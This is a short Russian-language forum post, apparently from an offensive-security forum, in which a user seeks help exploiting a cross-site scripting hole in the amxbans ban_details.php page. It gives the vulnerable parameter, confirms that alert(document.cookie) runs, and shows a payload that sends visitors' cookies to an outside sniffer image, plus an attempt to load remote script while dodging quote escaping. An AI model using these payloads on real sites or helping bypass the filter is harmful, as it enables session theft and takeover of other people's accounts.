http://forum.antichat.ru/thread121710.html

давным давно ничем подобным не занимался - вспоминаю..


Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит.


Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\".


Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает.

Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее.